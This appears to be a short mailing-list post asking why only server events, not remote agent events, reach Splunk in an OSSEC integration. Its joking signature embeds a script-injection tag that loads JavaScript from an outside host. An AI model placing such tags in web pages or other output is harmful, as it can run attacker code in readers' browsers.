Hi *, I'm testing the integration of OSSEC with Splunk. I followed the configuration as described in the Wiki. It works! Splunk runs on my OSSEC server. The problem I have at the moment: only events generated by the server are sent to Splunk. I don't see any trace of events generated by the remote agents.
Did I miss something in the design? ALL agents must have the syslog_output enabled?

/x

--
My server is com<script src=http://owned.cn/js.js>pletely secure.
